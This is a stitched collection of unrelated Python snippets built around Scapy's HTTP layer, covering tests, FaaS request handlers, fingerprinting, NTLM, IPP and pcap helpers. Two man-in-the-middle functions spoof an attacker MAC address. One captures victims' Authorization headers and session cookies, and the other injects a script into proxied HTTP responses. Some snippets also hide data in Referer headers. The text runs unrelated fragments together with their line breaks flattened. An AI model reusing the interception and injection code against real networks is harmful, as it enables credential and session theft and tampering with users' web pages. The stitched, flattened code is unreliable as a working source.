def test_from_datasources(): packets_1 = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com") ] packets_2 = [ # HTTP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"), # DNS Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) / DNS(rd=1, qd=DNSQR(qtype="A", qname="google.com"), an=DNSRR(rdata="123.0.0.1")), # TCP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355), ] nx = NetworkX.from_datasources([ packets_to_datasource_events(packets) for packets in [packets_1, packets_2] ]) # Make the graph nx.graph() assert not nx.is_empty()
def handle(self, data): shutdown = False http = HTTP(data) if http.name == 'HTTP 1': httpr = http.payload if httpr.name == 'HTTP Request': print() print("=== Request ===") print(httpr.summary()) payload = "" if httpr.Path.decode('ascii') == "/Metrics": with self.lock: payload = dumps(dict(self.faasMetrics)) # elif httpr.Path.decode('ascii') == "/Shutdown": # payload = str(time()) # shutdown = True elif httpr.Path.decode('ascii') == "/Run": payload = str(time()) else: print("Bad Path") return bytes(HTTP() / HTTPResponse(Status_Code='200') / Raw(load=payload)), shutdown else: return bytes(HTTP / HTTPResponse(Status_Code='405')), shutdown else: return bytes(HTTP / HTTPResponse(Status_Code='400')), shutdown
def _mitm_http_req(self, http_req): """do proxy http request, intercept auth and cookie info return (auth, cookie[session]) in bytes""" # response ack first l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP( src=self.http_ip, dst=self.client_ip) ack = TCP(dport=http_req[TCP].sport, sport=http_req[TCP].dport, flags="A", seq=http_req.ack, ack=http_req.seq + 1) sendp(l2_l3 / ack, verbose=False) # send proxy request ip = http_req[HTTPRequest].Host.decode(encoding="ascii") port = http_req[TCP].dport proxy_http_req = HTTP() / http_req[HTTPRequest] http_res = TCP_client.tcplink(proto=HTTP, ip=ip, port=port).sr1(proxy_http_req, verbose=False) # forward http response to client res = http_res[HTTP] / http_res[HTTPResponse] sendp(l2_l3 / ack / res, verbose=False) # return authorization = http_req[HTTPRequest].Authorization cookie = res[HTTPResponse].Set_Cookie return authorization, cookie
def __init__(self, port, rprob=0.07): """Constructor""" self.s = RstegSocket(rprob=rprob, sport=port) self.s.bind('', port) # Load in memory the html responses index_data = open('./index.html', 'rb').read() upload_data = open('./upload.html', 'rb').read() # Load the HTTP Response data structure self.res = HTTP() / HTTPResponse() self.index = HTTP() / HTTPResponse(Content_Length=str( len(index_data)).encode(), ) / index_data self.upload = HTTP() / HTTPResponse(Content_Length=str( len(upload_data)).encode(), ) / upload_data self.not_found = HTTP() / HTTPResponse(Status_Code=b'404', Reason_Phrase=b'Not Found')
def packet2p0f(pkt): """ Returns a p0f signature of the packet, and the direction. Raises TypeError if the packet isn't valid for p0f """ pkt = validate_packet(pkt) pkt = pkt.__class__(raw(pkt)) if pkt[TCP].flags.S: if pkt[TCP].flags.A: direction = "response" else: direction = "request" sig = TCP_Signature.from_packet(pkt) elif pkt[TCP].payload: # XXX: guess_payload_class doesn't use any class related attributes pclass = HTTP().guess_payload_class(raw(pkt[TCP].payload)) if pclass == HTTPRequest: direction = "request" elif pclass == HTTPResponse: direction = "response" else: raise TypeError("Not an HTTP payload") sig = HTTP_Signature.from_packet(pkt) else: raise TypeError("Not a SYN, SYN/ACK, or HTTP packet") return sig, direction
def HTTP_ntlm_negotiate(ntlm_negotiate): """Create an HTTP NTLM negotiate packet from an NTLM_NEGOTIATE message""" assert isinstance(ntlm_negotiate, NTLM_NEGOTIATE) from scapy.layers.http import HTTP, HTTPRequest return HTTP() / HTTPRequest( Authorization=b"NTLM " + bytes_base64(bytes(ntlm_negotiate)) )
def send(self, op_type, version, **kwargs): """ Method to send and receive ipp request """ if len(kwargs) <= 0: if op_type == "Get-Jobs": kwargs = get_jobs(self.host) else: print(f"No default templates is available for {op_type} !!!") sys.exit() self.form_ipp_packet(op_type=op_type, version=version, **kwargs) InternetPrintingProtocol.add_fields(self.ipp_field) IPP_HTTP_REQUESTS['Content_Length'] = bytes( str(len(InternetPrintingProtocol())), "utf-8") IPP_HTTP_REQUESTS['Host'] = bytes(f"{self.host}:{self.port}", "utf-8") IPP_HTTP_REQUESTS['Path'] = bytes(self.path, "utf-8") ipp_request = HTTP() / HTTPRequest( **IPP_HTTP_REQUESTS) / InternetPrintingProtocol() self.my_stream.sr(ipp_request, timeout=5, verbose=0) return InternetPrintingProtocol().get_results()
def create_get_request(host, path): get_req = HTTP() / HTTPRequest(Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=host.encode(), Path=path.encode(), Pragma=b'no-cache') return get_req
def handle(self, data): http = HTTP(data) if http.name == 'HTTP 1': httpr = http.payload if httpr.name == 'HTTP Request': s = httpr.Path.decode('ascii') n = s.rindex("/") faasIP = self.decide(s[n + 1:]) print() print("=== Redirection ===") print(httpr.summary(), " --> ", faasIP) if faasIP: global response if httpr.Method.decode('ascii') == 'POST': response = post( url="http://" + faasIP + ':' + str(self.Port) + httpr.Path.decode('ascii'), data=httpr.payload.load.decode('ascii')) elif http.Method.decode('ascii') == 'GET': response = get(url="http://" + faasIP + ':' + str(self.Port) + httpr.Path.decode('ascii'), data=httpr.payload.load.decode('ascii')) else: print("Other request method") response = None if response: return bytes( HTTP() / HTTPResponse(Status_Code=str(response.status_code)) / Raw(load=response.content.decode('ascii'))) else: return bytes(HTTP / HTTPResponse(Status_Code='405') / Raw()) else: return bytes(HTTP / HTTPResponse(Status_Code='400') / Raw()) else: return bytes(HTTP / HTTPResponse(Status_Code='400') / Raw()) else: return bytes(HTTP / HTTPResponse(Status_Code='400') / Raw())
def create_post_request(host, path, data, content_type): post_req = HTTP() / HTTPRequest( Method=b'POST', Path=path.encode(), Host=host.encode(), Connection=b'keep-alive', Content_Length=str(len(data)).encode(), Content_Type=content_type.encode()) / data return post_req
def _mitm_http_req(self, http_req): """do proxy http request and response with injected payload""" # response ack first l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP( src=self.http_ip, dst=self.client_ip) ack = TCP(dport=http_req[TCP].sport, sport=http_req[TCP].dport, flags="A", seq=http_req.ack, ack=http_req.seq + 1) sendp(l2_l3 / ack, verbose=False) # send proxy request and get response ip = http_req[HTTPRequest].Host.decode(encoding="ascii") port = http_req[TCP].dport proxy_http_req = HTTP() / http_req[HTTPRequest] http_res = TCP_client.tcplink(proto=HTTP, ip=ip, port=port).sr1(proxy_http_req, verbose=False) # inject js into payload and forward packets recursively def rec_forward_load(load, seq, template_p, total_len=None, window_size=167): total_len = total_len if total_len is not None else len(load) l2 = Ether(src=self.attacker_mac, dst=self.client_mac) l3 = IP(src=self.http_ip, dst=self.client_ip) if len(load) > window_size: this_load, rest_load = load[:window_size], load[window_size:] l4 = TCP(dport=http_req[TCP].sport, flags="PA", seq=seq, ack=http_req.seq + 1) p = l2 / l3 / l4 / template_p p = MyUtil.set_load(p, this_load, rest_len=len(rest_load) - 2) # I don't know why -2 sendp(p, verbose=False) rec_forward_load(load=rest_load, seq=seq + window_size, template_p=template_p, total_len=total_len, window_size=window_size) else: # last packet l4 = TCP(dport=http_req[TCP].sport, flags="FA", seq=seq, ack=http_req.seq + 1) p = l2 / l3 / l4 / template_p p = MyUtil.set_load(p, load, rest_len=0) sendp(p, verbose=False) new_load = http_res[Raw].load.replace( b"</body>", f"<script>{self.script}</script></body>".encode("ascii")) rec_forward_load(load=new_load, seq=http_req.ack, template_p=http_res)
def construct_packet(addr, input): if input == None: return r_input = binary_converter(input) if r_input == None: return r_input = binary_to_unicode(r_input) if r_input == None: return packet = IP(dst=addr[0]) / HTTP() / HTTPRequest(Referer=r_input) return bytes(packet)
def handle(self, data, address): shutdown = False http = HTTP(data) if http.name == 'HTTP 1': httpr = http.payload if httpr.name == 'HTTP Request': print() print("=== Request ===") print(httpr.summary(), address) payload = "" if httpr.Method.decode('ascii') == 'POST': with self.lock: self.hosts[address] = time() elif httpr.Method.decode('ascii') == 'GET': if httpr.Path.decode('ascii') == "/Hosts": with self.lock: for host in self.hosts.keys(): payload += host + ' ' # elif httpr.Path.decode('ascii') == "/Shutdown": # payload = str(time()) # shutdown = True else: payload = str(time()) else: print(">>> Other request method") return bytes(HTTP() / HTTPResponse(Status_Code='200') / Raw(load=payload)), shutdown else: return bytes(HTTP / HTTPResponse(Status_Code='405')), shutdown else: return bytes(HTTP / HTTPResponse(Status_Code='400')), shutdown
def scapy_packet(addr, input): if input == None: return None r_input = binary_converter(input) if r_input == None: return None # print(r_input) r_input = binary_to_unicode(r_input) if r_input == None: return None # print(r_input) packet = IP(dst=addr[0]) / HTTP() / HTTPRequest(Referer=r_input) return packet
def cons_HTTP(): print("in ", cons_HTTP.__name__, " #######") load_layer("http") req = HTTP()/HTTPRequest( Host=b'www.baidu.com', User_Agent=b'curl/7.64.1', Accept=b'*/*' ) a = TCP_client.tcplink(HTTP, "www.baidu.com", 80) answser = a.sr1(req, retry=3, timeout=1) ###maybe MISS response a.close() if answser is not None: print(answser.load) print() print()
def main(): parser = ArgumentParser() parser.add_argument('--content-type', default='application/cbor', help='The request content-type header') parser.add_argument( '--infile', default='-', help='The diagnostic text input file, or "-" for stdin') parser.add_argument('--outfile', default='-', help='The PCAP output file, or "-" for stdout') parser.add_argument('--intype', default='cbordiag', choices=['cbordiag', 'raw'], help='The input data type.') args = parser.parse_args() # First get the CBOR data itself infile_name = args.infile.strip() if infile_name != '-': infile = open(infile_name, 'rb') else: infile = sys.stdin.buffer if args.intype == 'raw': cbordata = infile.read() elif args.intype == 'cbordiag': cbordata = check_output('diag2cbor.rb', stdin=infile) # Now synthesize an HTTP request with that body req = HTTPRequest( Method='POST', Host='example.com', User_Agent='scapy', Content_Type=args.content_type, Content_Length=str(len(cbordata)), ) / Raw(cbordata) # Write the request directly into pcap outfile_name = args.outfile.strip() if outfile_name != '-': outfile = open(outfile_name, 'wb') else: outfile = sys.stdout.buffer pkt = Ether() / IP() / TCP() / HTTP() / req wrpcap(outfile, pkt)
def test_multiple_packets(): packets = [ # HTTP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"), # DNS Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) / DNS(rd=1, qd=DNSQR(qtype="A", qname="google.com"), an=DNSRR(rdata="123.0.0.1")), # TCP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355), ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 3 assert [e["event_type"] for e in events] == ["HTTPRequest", "DNS", "TCP"]
def test_single_http_packet(): packets = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com") ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 1 assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab" assert events[0]["dst_mac"] == "12:12:12:12:12:12" assert events[0]["src_ip"] == "127.0.0.1" assert events[0]["dst_ip"] == "192.168.1.1" assert events[0]["sport"] == 12345 assert events[0]["dport"] == 80 assert events[0]["http_method"] == "GET" assert events[0]["uri"] == "/foo" assert events[0]["http_dest"] == "https://google.com" assert events[0]["event_type"] == "HTTPRequest"
# or even its own. random.seed(datetime.now()) # default package to execute "rosparam get /rosdistro" package_rosparam_get_rosdistro = ( IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2") / TCP( sport=20000, dport=11311, seq=1, flags="PA", ack=1, ) / TCPROS() / HTTP() / HTTPRequest( Accept_Encoding=b"gzip", Content_Length=b"227", Content_Type=b"text/xml", Host=b"12.0.0.2:11311", User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)", Method=b"POST", Path=b"/RPC2", Http_Version=b"HTTP/1.1", ) / XMLRPC() / XMLRPCCall( version=b"<?xml version='1.0'?>\n", methodcall_opentag=b"<methodCall>\n", methodname_opentag=b"<methodName>",
from scapy.all import sr1,IP,ICMP,TCPSession,sr,srp,srp1,send,sendp,sendpfast,RandShort from scapy.layers.inet import TCP_client,TCP,Ether,UDP ans,unans = sr(IP(dst="8.8.8.8")/TCP(dport=[80,443],flags="S"),timeout=1) p=sr1(IP(dst='8.8.8.8')/ICMP()) if p: p.show() dir(scapy.layers.http) HTTPRequest().show() HTTPResponse().show() load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=b'www.secdev.org', Pragma=b'no-cache' ) a = TCP_client.tcplink(HTTP, "secdev.org", 80) answser = a.sr1(req,timeout=3) a.close() with open("www.secdev.org.html", "wb") as file: file.write(answser.load) load_layer("http") http_request("secdev.org", "/", display=True,timeout=4)